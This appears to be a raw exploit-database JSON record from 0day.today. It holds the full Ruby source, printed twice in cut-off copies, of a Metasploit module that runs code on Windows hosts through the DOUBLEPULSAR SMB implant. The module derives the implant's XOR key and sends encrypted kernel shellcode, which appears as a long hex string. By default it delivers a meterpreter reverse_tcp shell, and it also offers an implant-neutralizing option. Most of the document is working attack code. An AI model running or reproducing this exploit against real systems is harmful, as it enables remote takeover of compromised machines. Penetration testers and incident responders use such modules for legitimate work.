calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-25] #"}, "lastseen": "2021-10-25T00:15:24", "differentElements": ["sourceData"], "edition": 54}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "ecc24edc6ead1c44334b9cc5108e687c", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-26T08:20:15", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96706", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-26T08:20:15", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-26T08:20:15", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n 